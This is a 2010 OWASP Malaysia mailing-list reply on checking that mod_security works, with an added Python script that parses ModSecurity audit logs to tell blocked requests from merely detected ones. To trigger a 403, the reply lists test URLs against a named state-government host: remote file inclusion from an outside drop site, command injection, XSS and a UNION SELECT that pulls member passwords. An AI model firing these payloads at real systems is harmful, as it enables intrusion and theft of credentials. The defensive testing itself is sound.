On 05/09/2010, Muzamir Mokhtar <[email protected]> wrote:
> Salam,
>
> I have set up mod_security in my httpd.
> I have used rules from OWASP.
> I have enabled the rules and use the default ruleset.
> I have enabled the audit log.
>
> Question :
> 1) How do I know my mod_security is working properly?
Try a basic attack:

http://cobaan.pahang.gov.my/index.php?page=http://www.rfi-drop-site.net/rfi.txt????????
http://cobaan.pahang.gov.my/index.php?exec=uname -a
http://cobaan.pahang.gov.my/index.php?search=<script>alert(123);</script>
http://cobaan.pahang.gov.my/index.php?id=-13+union+select+concat_ws%280x3a,member_id,member_first_name,member_last_name,member_login,member_password%29,2,3,4+from+members--

If your installation was successful, you will get a 403 error :)

> 2) Is there any additional modification I need to do in order to block
> vulnerable attacks such as SQL injection, XSS, spam comments and
> others.

As you mentioned, the rules from OWASP have been used :) so there is no need to modify anything for SQL injection, RFI, remote command injection or XSS. But for comment spam, put in a CAPTCHA, that would be nice :)

P/S: I'm from Pahang too! :P

> Please do advise me on this.
>
> --
> Muzamir bin Mokhtar,
> Pegawai Teknologi Maklumat (F44)
> Unit Operasi
> Bahagian Teknologi Maklumat
> Pej SUK Pahang
> TEL : 095129424/425
> FAX : 095163490
> http://muzzoshah.blogspot.com
> http://muzzotechspot.blogspot.com
>
> ----------------------------------------------------------------
> DISCLAIMER:
> This e-mail and the attachment is from State Government of Pahang,
> Malaysia. It is intended solely for the person to whom they are
> addressed and may be confidential and privileged. If you are not the
> intended recipient, you are notified that disclosing, distributing,
> copying or taking any action in reliance of the content of this
> information is strictly prohibited. Please notify the sender
> immediately if you have received this e-mail and delete it from your
> system. The recipient should check the e-mail and any attachment for
> the presence of viruses that could be transmitted via e-mail. Email
> transmission cannot be guaranteed to be secure or error free as
> information could be intercepted, corrupted, lost, destroyed,
> incomplete or contain viruses. State Government of Pahang, Malaysia
> accepts no liability for any errors or omissions in the contents of
> this message which arises as a result of e-mail transmission.
> Opinions, conclusions and other information in this e-mail that does
> not relate to the official business of State Government of Pahang,
> Malaysia shall be understood as neither given nor endorsed by State
> Government of Pahang, Malaysia.
>
> _______________________________________________
> Owasp-Malaysia mailing list
> [email protected]
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
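The reply answers "is it working?" by watching for a 403 on test requests. Since the original poster also enabled the audit log, the other half of that check is reading the audit log to confirm the rules that fired and that the engine actually intercepted the request rather than only logging it (a common surprise when SecRuleEngine is left on DetectionOnly). The script below is an added example written for this thread, not code from the list or from the ModSecurity project. It parses ModSecurity 2.x's native serial audit log format (SecAuditLogType Serial, sections A/B/F/H/Z) and classifies each transaction as blocked, matched-but-not-blocked, or clean. The embedded log entries, boundaries, hosts, file names and rule ids are constructed for the example and do not come from any real server or from the OWASP Core Rule Set.

```python
import re
from collections import Counter

# Constructed sample in the native serial format ModSecurity 2.x writes with
# SecAuditEngine On and SecAuditLogType Serial. Boundaries, unique ids,
# addresses, file names and rule ids are made up for this example.
SAMPLE_AUDIT_LOG = """\
--c0ffee01-A--
[05/Sep/2010:10:15:21 +0800] SEoxAQAAAEA 192.0.2.10 54321 198.51.100.5 80
--c0ffee01-B--
GET /index.php?search=%3Cscript%3Ealert(123);%3C/script%3E HTTP/1.1
Host: www.example.test
User-Agent: curl/7.19.7
--c0ffee01-F--
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=iso-8859-1
--c0ffee01-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)<script" at ARGS:search. [file "/etc/modsecurity/example_xss.conf"] [line "1"] [id "900001"] [msg "Cross-site Scripting (XSS) Attack"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
Engine-Mode: "ENABLED"
--c0ffee01-Z--

--c0ffee02-A--
[05/Sep/2010:10:16:02 +0800] SEoxAgAAAEB 192.0.2.10 54322 198.51.100.5 80
--c0ffee02-B--
GET /index.php?id=1%20union%20select%201,2,3 HTTP/1.1
Host: www.example.test
--c0ffee02-F--
HTTP/1.1 200 OK
Content-Type: text/html
--c0ffee02-H--
Message: Warning. Pattern match "(?i)union\\s+select" at ARGS:id. [file "/etc/modsecurity/example_sqli.conf"] [line "3"] [id "900002"] [msg "SQL Injection Attack"] [severity "CRITICAL"]
Engine-Mode: "DETECTION_ONLY"
--c0ffee02-Z--
"""

BOUNDARY_RE = re.compile(r"^--([0-9A-Za-z]+)-([A-Z])--$")   # e.g. --c0ffee01-H--
STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")             # first line of section F
RULE_ID_RE = re.compile(r'\[id "(\d+)"\]')                   # [id "900001"] in section H


def parse_audit_log(text):
    """Split a serial audit log into entries of the form
    {"boundary": str, "sections": {letter: [lines]}}; A opens, Z closes."""
    entries, current, section = [], None, None
    for line in text.splitlines():
        m = BOUNDARY_RE.match(line)
        if m:
            boundary, part = m.groups()
            if part == "A":                      # a new transaction starts
                current = {"boundary": boundary, "sections": {}}
            if current is None or current["boundary"] != boundary:
                continue                         # stray line outside any entry
            if part == "Z":                      # transaction complete
                entries.append(current)
                current, section = None, None
            else:
                section = current["sections"].setdefault(part, [])
            continue
        if section is not None and line:
            section.append(line)
    return entries


def summarize(entry):
    """Reduce one entry to the fields that answer 'did the WAF block it?'."""
    secs = entry["sections"]
    status = None
    for line in secs.get("F", []):
        m = STATUS_RE.match(line)
        if m:
            status = int(m.group(1))
            break
    h = secs.get("H", [])
    messages = [l for l in h if l.startswith("Message:")]
    engine = next((l.split(":", 1)[1].strip().strip('"')
                   for l in h if l.startswith("Engine-Mode:")), None)
    return {
        "request": secs.get("B", [""])[0],
        "status": status,
        "engine_mode": engine,
        "rule_ids": [m.group(1) for l in messages for m in [RULE_ID_RE.search(l)] if m],
        "denied": any(l.startswith("Message: Access denied") for l in messages),
    }


def audit_report(text):
    """One summary per transaction with a verdict: blocked, matched-not-blocked, clean."""
    report = []
    for entry in parse_audit_log(text):
        s = summarize(entry)
        if s["denied"]:
            s["verdict"] = "blocked"
        elif s["rule_ids"]:
            s["verdict"] = "matched-not-blocked"   # rules fired but nothing intercepted
        else:
            s["verdict"] = "clean"
        report.append(s)
    return report


def rule_hit_counts(text):
    """How often each rule id fired; handy for spotting noisy rules before tuning."""
    return Counter(rid for s in audit_report(text) for rid in s["rule_ids"])


if __name__ == "__main__":
    for s in audit_report(SAMPLE_AUDIT_LOG):
        print(f'{s["verdict"]:20} {s["status"]} {str(s["engine_mode"]):15} '
              f'{s["rule_ids"]} {s["request"]}')
```

Run it against your own audit log by reading the file into `audit_report`. A test request that shows up as "matched-not-blocked" with `Engine-Mode: "DETECTION_ONLY"` means the ruleset is loaded and matching but the engine is not enforcing, which is exactly the case where the browser check alone (waiting for a 403) would mislead you.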

